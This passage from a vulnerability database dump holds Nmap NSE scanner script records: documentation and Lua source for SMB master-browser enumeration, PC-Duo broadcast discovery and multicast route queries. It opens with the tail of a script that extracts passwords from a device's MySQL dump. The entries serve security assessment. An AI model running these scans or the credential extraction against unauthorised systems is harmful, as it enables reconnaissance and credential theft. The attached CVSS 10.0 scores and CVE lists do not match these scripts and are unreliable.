Extracting system info from MySQL database dump\")\n\n -- Count users\n if string.match(config_file, \"'user_default_email_address',\") then\n for _ in string.gmatch(config_file, \"'user_default_email_address',\") do user_count = user_count + 1 end\n end\n table.insert(result, string.format(\"Users: %s\", user_count))\n\n -- Extract system info\n local vars = {\n {\"Device\", \"branding_device_name\"},\n {\"Version\",\"httpd_last_release_notes_version_read\"},\n {\"Hostname\",\"system_default_hostname\"},\n {\"Domain\",\"system_default_domain\"},\n {\"Timezone\",\"system_timezone\"},\n {\"Language\",\"default_ndr_lang\"},\n {\"Password\",\"system_password\"},\n {\"API Password\",\"api_password\"},\n {\"MTA SASL LDAP Password\",\"mta_sasl_ldap_advanced_password\"},\n {\"Gateway\",\"system_gateway\"},\n {\"Primary DNS\",\"system_primary_dns_server\"},\n {\"Secondary DNS\",\"system_secondary_dns_server\"},\n {\"DNS Cache\",\"dns_cache\"},\n {\"Backup Server\",\"backup_server\"},\n {\"Backup Port\",\"backup_port\"},\n {\"Backup Type\",\"backup_type\"},\n {\"Backup Username\",\"backup_username\"},\n {\"Backup Password\",\"backup_password\"},\n {\"NTP Enabled\",\"system_ntp\"},\n {\"NTP Server\",\"system_ntp_server\"},\n {\"SSH Enabled\",\"system_ssh_enable\"},\n {\"BRTS Enabled\",\"brts_enable\"},\n {\"BRTS Server\",\"brts_lookup_domain\"},\n {\"HTTP Port\",\"http_port\"},\n {\"HTTP Disabled\",\"http_shutoff\"},\n {\"HTTPS Port\",\"https_port\"},\n {\"HTTPS Only\",\"https_only\"},\n }\n for _, var in ipairs(vars) do\n local var_match = string.match(config_file, string.format(\"'%s','([^']+)','global',\", var[2]))\n if var_match then table.insert(result, string.format(\"%s: %s\", var[1], var_match)) end\n end\n\n table.insert(result, \"\\nVulnerable to directory traversal vulnerability:\\nhttp://seclists.org/fulldisclosure/2010/Oct/119\")\n\n -- Return results\n return stdnse.format_output(true, result)\n\nend\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:35:25", "description": "Queries information managed by the Windows Master Browser.\n\n## Script Arguments \n\n#### smb-mbenum.format \n\n(optional) if set, changes the format of the result returned by the script. There are three possible formats: 1\\. Ordered by type horizontally 2\\. Ordered by type vertically 3\\. Ordered by type vertically with details (default)\n\n#### smb-mbenum.domain \n\n(optional) if not specified, lists the domain of the queried browser\n\n#### smb-mbenum.filter \n\n(optional) if set, queries the browser for a specific type of server (@see ServerTypes)\n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 445 <host> --script smb-mbenum\n \n\n## Script Output \n \n \n | smb-mbenum:\n | Backup Browser\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | DFS Root\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Master Browser\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | SQL Server\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Server\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Server service\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Windows NT/2000/XP/2003 server\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n | Workstation\n | TIME-CAPSULE 4.32 Time Capsule\n | WIN2K3-1 5.2 MSSQL Server backend\n |_ WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n \n\n## Requires \n\n * [msrpc](<../lib/msrpc.html>)\n 
* [smb](<../lib/smb.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-06-19T18:47:19", "type": "nmap", "title": "smb-mbenum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:SMB-MBENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/smb-mbenum.html", "sourceData": "local msrpc = require \"msrpc\"\nlocal smb = require \"smb\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal table = require \"table\"\n\ndescription=[[\nQueries information managed by the Windows Master Browser.\n]]\n\n---\n-- @usage\n-- nmap -p 445 <host> --script smb-mbenum\n--\n-- @output\n-- | smb-mbenum:\n-- | Backup Browser\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | DFS Root\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Master Browser\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | SQL Server\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | 
Server\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Server service\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Windows NT/2000/XP/2003 server\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- | WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n-- | Workstation\n-- | TIME-CAPSULE 4.32 Time Capsule\n-- | WIN2K3-1 5.2 MSSQL Server backend\n-- |_ WIN2K3-EPI-1 5.2 EPiServer 2003 frontend server\n--\n-- @args smb-mbenum.format (optional) if set, changes the format of the result\n-- returned by the script. There are three possible formats:\n-- 1. Ordered by type horizontally\n-- 2. Ordered by type vertically\n-- 3. Ordered by type vertically with details (default)\n--\n-- @args smb-mbenum.filter (optional) if set, queries the browser for a\n-- specific type of server (@see ServerTypes)\n--\n-- @args smb-mbenum.domain (optional) if not specified, lists the domain of the queried browser\n--\n\n--\n-- Version 0.1\n-- Created 06/11/2011 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nhostrule = function(host) return smb.get_port(host) ~= nil end\n\nlocal function log(msg) stdnse.debug3(\"%s\", msg) end\n\nServerTypes = {\n SV_TYPE_WORKSTATION = 0x00000001,\n SV_TYPE_SERVER = 0x00000002,\n SV_TYPE_SQLSERVER = 0x00000004,\n SV_TYPE_DOMAIN_CTRL = 0x00000008,\n SV_TYPE_DOMAIN_BAKCTRL = 0x00000010,\n SV_TYPE_TIME_SOURCE = 0x00000020,\n SV_TYPE_AFP = 0x00000040,\n SV_TYPE_NOVELL = 0x00000080,\n SV_TYPE_DOMAIN_MEMBER = 0x00000100,\n SV_TYPE_PRINTQ_SERVER = 0x00000200,\n SV_TYPE_DIALIN_SERVER = 0x00000400,\n SV_TYPE_SERVER_UNIX = 0x00000800,\n SV_TYPE_NT = 0x00001000,\n SV_TYPE_WFW = 0x00002000,\n SV_TYPE_SERVER_MFPN = 
0x00004000,\n SV_TYPE_SERVER_NT = 0x00008000,\n SV_TYPE_POTENTIAL_BROWSER = 0x00010000,\n SV_TYPE_BACKUP_BROWSER = 0x00020000,\n SV_TYPE_MASTER_BROWSER = 0x00040000,\n SV_TYPE_DOMAIN_MASTER = 0x00080000,\n SV_TYPE_WINDOWS = 0x00400000,\n SV_TYPE_DFS = 0x00800000,\n SV_TYPE_CLUSTER_NT = 0x01000000,\n SV_TYPE_TERMINALSERVER = 0x02000000,\n SV_TYPE_CLUSTER_VS_NT = 0x04000000,\n SV_TYPE_DCE = 0x10000000,\n SV_TYPE_ALTERNATE_XPORT = 0x20000000,\n SV_TYPE_LOCAL_LIST_ONLY = 0x40000000,\n SV_TYPE_DOMAIN_ENUM = 0x80000000,\n SV_TYPE_ALL = 0xFFFFFFFF\n}\n\nTypeNames = {\n SV_TYPE_WORKSTATION = { long = \"Workstation\", short = \"WKS\" },\n SV_TYPE_SERVER = { long = \"Server service\", short = \"SRVSVC\" },\n SV_TYPE_SQLSERVER = { long = \"SQL Server\", short = \"MSSQL\" },\n SV_TYPE_DOMAIN_CTRL = { long = \"Domain Controller\", short = \"DC\" },\n SV_TYPE_DOMAIN_BAKCTRL = { long = \"Backup Domain Controller\", short = \"BDC\" },\n SV_TYPE_TIME_SOURCE = { long = \"Time Source\", short = \"TIME\" },\n SV_TYPE_AFP = { long = \"Apple File Protocol Server\", short = \"AFP\" },\n SV_TYPE_NOVELL = { long = \"Novell Server\", short = \"NOVELL\" },\n SV_TYPE_DOMAIN_MEMBER = { long = \"LAN Manager Domain Member\", short = \"MEMB\" },\n SV_TYPE_PRINTQ_SERVER = { long = \"Print server\", short = \"PRINT\" },\n SV_TYPE_DIALIN_SERVER = { long = \"Dial-in server\", short = \"DIALIN\" },\n SV_TYPE_SERVER_UNIX = { long = \"Unix server\", short = \"UNIX\" },\n SV_TYPE_NT = { long = \"Windows NT/2000/XP/2003 server\", short = \"NT\" },\n SV_TYPE_WFW = { long = \"Windows for workgroups\", short = \"WFW\" },\n SV_TYPE_SERVER_MFPN = { long = \"Microsoft File and Print for Netware\", short=\"MFPN\" },\n SV_TYPE_SERVER_NT = { long = \"Server\", short = \"SRV\" },\n SV_TYPE_POTENTIAL_BROWSER = { long = \"Potential Browser\", short = \"POTBRWS\" },\n SV_TYPE_BACKUP_BROWSER = { long = \"Backup Browser\", short = \"BCKBRWS\"},\n SV_TYPE_MASTER_BROWSER = { long = \"Master Browser\", short = 
\"MBRWS\"},\n SV_TYPE_DOMAIN_MASTER = { long = \"Domain Master Browser\", short = \"DOMBRWS\"},\n SV_TYPE_WINDOWS = { long = \"Windows 95/98/ME\", short=\"WIN95\"},\n SV_TYPE_DFS = { long = \"DFS Root\", short = \"DFS\"},\n SV_TYPE_TERMINALSERVER = { long = \"Terminal Server\", short = \"TS\" },\n}\n\nOutputFormat = {\n BY_TYPE_H = 1,\n BY_TYPE_V = 2,\n BY_TYPE_V_DETAILED = 3,\n}\n\n\naction = function(host, port)\n\n local status, smbstate = smb.start(host)\n local err, entries\n local path = (\"\\\\\\\\%s\\\\IPC$\"):format(host.ip)\n local detail_level = 1\n local format = stdnse.get_script_args(\"smb-mbenum.format\") or OutputFormat.BY_TYPE_V_DETAILED\n local filter = stdnse.get_script_args(\"smb-mbenum.filter\") or ServerTypes.SV_TYPE_ALL\n local domain = stdnse.get_script_args(\"smb-mbenum.domain\")\n\n filter = tonumber(filter) or ServerTypes[filter]\n format = tonumber(format)\n\n if ( not(filter) ) then\n return \"\\n The argument smb-mbenum.filter contained an invalid value.\"\n end\n\n if ( not(format) ) then\n return \"\\n The argument smb-mbenum.format contained an invalid value.\"\n end\n\n local errstr = nil\n status, err = smb.negotiate_protocol(smbstate, {})\n if ( not(status) ) then\n log(\"ERROR: smb.negotiate_protocol failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, err = smb.start_session(smbstate, {})\n if ( not(status) ) then\n log(\"ERROR: smb.start_session failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. err\n else\n\n status, err = smb.tree_connect(smbstate, path, {})\n if ( not(status) ) then\n log(\"ERROR: smb.tree_connect failed\")\n errstr = \"\\n ERROR: Failed to connect to browser service: \" .. 
err\n else\n\n status, entries = msrpc.rap_netserverenum2(smbstate, domain, filter, detail_level)\n if ( not(status) ) then\n log(\"ERROR: msrpc.rap_netserverenum2 failed\")\n -- 71 == 0x00000047, ERROR_REQ_NOT_ACCEP\n -- http://msdn.microsoft.com/en-us/library/cc224501.aspx\n if entries:match(\"= 71$\") then\n errstr = \"Not a master or backup browser\"\n else\n errstr = \"\\n ERROR: \" .. entries\n end\n end\n end\n\n status, err = smb.tree_disconnect(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.tree_disconnect failed\") end\n end\n\n status, err = smb.logoff(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.logoff failed\") end\n end\n\n status, err = smb.stop(smbstate)\n if ( not(status) ) then log(\"ERROR: smb.stop failed\") end\n\n if errstr then\n return errstr\n end\n\n local results, output = {}, {}\n for k, _ in pairs(ServerTypes) do\n for _, server in ipairs(entries) do\n if ( TypeNames[k] and (server.type & ServerTypes[k]) == ServerTypes[k] ) then\n results[TypeNames[k].long] = results[TypeNames[k].long] or {}\n if ( format == OutputFormat.BY_TYPE_V_DETAILED ) then\n table.insert(results[TypeNames[k].long], server)\n else\n table.insert(results[TypeNames[k].long], server.name)\n end\n end\n end\n end\n\n if ( format == OutputFormat.BY_TYPE_H ) then\n for k, v in pairs(results) do\n local row = (\"%s: %s\"):format( k, table.concat(v, \",\") )\n table.insert(output, row)\n end\n table.sort(output)\n elseif( format == OutputFormat.BY_TYPE_V ) then\n for k, v in pairs(results) do\n v.name = k\n table.insert(output, v)\n end\n table.sort(output, function(a,b) return a.name < b.name end)\n elseif( format == OutputFormat.BY_TYPE_V_DETAILED ) then\n for k, v in pairs(results) do\n local cat_tab = tab.new(3)\n table.sort(v, function(a,b) return a.name < b.name end )\n for _, server in pairs(v) do\n tab.addrow(\n cat_tab,\n server.name,\n (\"%d.%d\"):format(server.version.major,server.version.minor),\n server.comment\n )\n end\n table.insert(output, { 
name = k, tab.dump(cat_tab) } )\n end\n table.sort(output, function(a,b) return a.name < b.name end)\n end\n\n return stdnse.format_output(true, output)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:56", "description": "Discovers PC-DUO remote control hosts and gateways running on a LAN by sending a special broadcast UDP probe.\n\n## Script Arguments \n\n#### broadcast-pc-duo.timeout \n\nspecifies the amount of seconds to sniff the network interface. (default varies according to timing. -T3 = 5s)\n\n## Example Usage \n \n \n nmap --script broadcast-pc-duo\n \n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-pc-duo:\n | PC-Duo Gateway Server\n | 10.0.200.113 - WIN2K3SRV-1\n | PC-Duo Hosts\n |_ 10.0.200.113 - WIN2K3SRV-1\n \n\n## Requires \n\n * [coroutine](<>)\n * [nmap](<../lib/nmap.html>)\n * [os](<>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-12-18T09:33:38", "type": "nmap", "title": "broadcast-pc-duo NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2012-1182", "CVE-2017-7494"], "modified": "2017-03-25T13:39:44", "id": "NMAP:BROADCAST-PC-DUO.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-pc-duo.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal nmap = require \"nmap\"\nlocal os = require \"os\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nDiscovers PC-DUO remote control hosts and gateways running on a LAN by sending a special broadcast UDP probe.\n]]\n\n---\n-- @usage\n-- nmap --script broadcast-pc-duo\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-pc-duo:\n-- | PC-Duo Gateway Server\n-- | 10.0.200.113 - WIN2K3SRV-1\n-- | PC-Duo Hosts\n-- |_ 10.0.200.113 - WIN2K3SRV-1\n--\n-- @args broadcast-pc-duo.timeout specifies the amount of seconds to sniff\n-- the network interface. (default varies according to timing. -T3 = 5s)\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"broadcast\", \"safe\" }\n\nlocal TIMEOUT = stdnse.parse_timespec(stdnse.get_script_args(\"broadcast-pc-duo.timeout\"))\n\nprerule = function() return ( nmap.address_family() == \"inet\") end\n\n-- Sends a UDP probe to the server and processes the response\n-- @param probe table containing a pc-duo probe\n-- @param responses table containing the responses\nlocal function udpProbe(probe, responses)\n\n local condvar = nmap.condvar(responses)\n local socket = nmap.new_socket(\"udp\")\n socket:set_timeout(500)\n\n for i=1,2 do\n local status = socket:sendto(probe.host, probe.port, probe.data)\n if ( not(status) ) then\n return stdnse.format_output(false, \"Failed to send broadcast request\")\n end\n end\n\n local timeout = TIMEOUT or ( 20 / ( nmap.timing_level() + 1 ) )\n local stime = os.time()\n local hosts = {}\n\n repeat\n local status, data = socket:receive()\n if ( status ) then\n local srvname = data:match(probe.match)\n if ( srvname ) then\n local status, _, _, rhost, _ = 
socket:get_info()\n if ( not(status) ) then\n socket:close()\n return false, \"Failed to get socket information\"\n end\n -- avoid duplicates\n hosts[rhost] = srvname\n end\n end\n until( os.time() - stime > timeout )\n socket:close()\n\n local result = {}\n for ip, name in pairs(hosts) do\n table.insert(result, (\"%s - %s\"):format(ip,name))\n end\n\n if ( #result > 0 ) then\n result.name = probe.topic\n table.insert(responses, result)\n end\n\n condvar \"signal\"\nend\n\naction = function()\n\n -- PC-Duo UDP probes\n local probes = {\n -- PC-Duo Host probe\n {\n host = { ip = \"255.255.255.255\" },\n port = { number = 1505, protocol = \"udp\" },\n data = stdnse.fromhex(\"00808008ff00\"),\n match= \"^.........(%w*)\\0\",\n topic= \"PC-Duo Hosts\"\n },\n -- PC-Duo Gateway Server probe\n {\n host = { ip = \"255.255.255.255\" },\n port = { number = 2303, protocol = \"udp\" },\n data = stdnse.fromhex(\"20908008ff00\"),\n match= \"^.........(%w*)\\0\",\n topic= \"PC-Duo Gateway Server\"\n },\n }\n\n local threads, responses = {}, {}\n local condvar = nmap.condvar(responses)\n\n -- start a thread for each probe\n for _, p in ipairs(probes) do\n local th = stdnse.new_thread( udpProbe, p, responses )\n threads[th] = true\n end\n\n -- wait until the probes are all done\n repeat\n for thread in pairs(threads) do\n if coroutine.status(thread) == \"dead\" then\n threads[thread] = nil\n end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until next(threads) == nil\n\n table.sort(responses, function(a,b) return a.name < b.name end)\n -- did we get any responses\n if ( #responses > 0 ) then\n return stdnse.format_output(true, responses)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:40:42", "description": "Queries targets for multicast routing information. 
\n\nThis works by sending a DVMRP Ask Neighbors 2 request to the target and listening for DVMRP Neighbors 2 responses that are sent back and which contain local addresses and the multicast neighbors on each interface of the target. If no specific target is specified, the request will be sent to the 224.0.0.1 All Hosts multicast address. \n\nThis script is somewhat similar to the mrinfo utility included with Windows and Cisco IOS.\n\n## Script Arguments \n\n#### mrinfo.target \n\nHost to which the request is sent. If not set, the request will be sent to `224.0.0.1`.\n\n#### mrinfo.timeout \n\nTime to wait for responses. Defaults to `5s`.\n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script mrinfo\n nmap --script mrinfo -e eth1\n nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'\n \n\n## Script Output \n \n \n Pre-scan script results:\n | mrinfo:\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.2\n | Neighbor: 172.16.0.4\n | Neighbor: 172.16.0.3\n | Local address: 172.17.0.1\n | Neighbor: 172.17.0.2\n | Local address: 172.18.0.1\n | Neighbor: 172.18.0.2\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.4\n | Neighbor: 172.16.0.3\n | Neighbor: 172.16.0.2\n | Local address: 172.17.0.2\n | Neighbor: 172.17.0.1\n | Source: 224.0.0.1\n | Version 12.4\n | Local address: 172.16.0.3\n | Neighbor: 172.16.0.4\n | Neighbor: 172.16.0.2\n | Local address: 172.18.0.2\n | Neighbor: 172.18.0.1\n |_ Use the newtargets script-arg to add the responses as targets\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [ipOps](<../lib/ipOps.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [target](<../lib/target.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", 
"scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-03T22:58:29", "type": "nmap", "title": "mrinfo NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-08T17:07:01", "id": "NMAP:MRINFO.NSE", "href": "https://nmap.org/nsedoc/scripts/mrinfo.html", "sourceData": "local nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal ipOps = require \"ipOps\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal target = require \"target\"\nlocal table = require \"table\"\n\n\ndescription = [[\nQueries targets for multicast routing information.\n\nThis works by sending a DVMRP Ask Neighbors 2 request to the target and\nlistening for DVMRP Neighbors 2 responses that are sent back and which contain\nlocal addresses and the multicast neighbors on each interface of the target. If\nno specific target is specified, the request will be sent to the 224.0.0.1 All\nHosts multicast address.\n\nThis script is similar somehow to the mrinfo utility included with Windows and\nCisco IOS.\n]]\n\n---\n-- @args mrinfo.target Host to which the request is sent. 
If not set, the\n-- request will be sent to <code>224.0.0.1</code>.\n--\n-- @args mrinfo.timeout Time to wait for responses.\n-- Defaults to <code>5s</code>.\n--\n--@usage\n-- nmap --script mrinfo\n-- nmap --script mrinfo -e eth1\n-- nmap --script mrinfo --script-args 'mrinfo.target=172.16.0.4'\n--\n--@output\n-- Pre-scan script results:\n-- | mrinfo:\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.2\n-- | Neighbor: 172.16.0.4\n-- | Neighbor: 172.16.0.3\n-- | Local address: 172.17.0.1\n-- | Neighbor: 172.17.0.2\n-- | Local address: 172.18.0.1\n-- | Neighbor: 172.18.0.2\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.4\n-- | Neighbor: 172.16.0.3\n-- | Neighbor: 172.16.0.2\n-- | Local address: 172.17.0.2\n-- | Neighbor: 172.17.0.1\n-- | Source: 224.0.0.1\n-- | Version 12.4\n-- | Local address: 172.16.0.3\n-- | Neighbor: 172.16.0.4\n-- | Neighbor: 172.16.0.2\n-- | Local address: 172.18.0.2\n-- | Neighbor: 172.18.0.1\n-- |_ Use the newtargets script-arg to add the responses as targets\n--\n\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\", \"broadcast\"}\n\n\nprerule = function()\n if nmap.address_family() ~= 'inet' then\n stdnse.verbose1(\"is IPv4 only.\")\n return false\n end\n if not nmap.is_privileged() then\n stdnse.verbose1(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n-- Parses a DVMRP Ask Neighbor 2 raw data and returns\n-- a structured response.\n-- @param data raw data.\nlocal mrinfoParse = function(data)\n local index, address, neighbor\n local response = {}\n\n -- first byte should be IGMP type == 0x13 (DVMRP)\n if data:byte(1) ~= 0x13 then return end\n\n -- DVMRP Code\n response.code,\n -- Checksum\n response.checksum,\n -- Capabilities (Skip one reserved byte)\n response.capabilities,\n -- Major and minor version\n response.minver,\n response.majver, index = 
string.unpack(\">B I2 x B B B\", data, 2)\n resp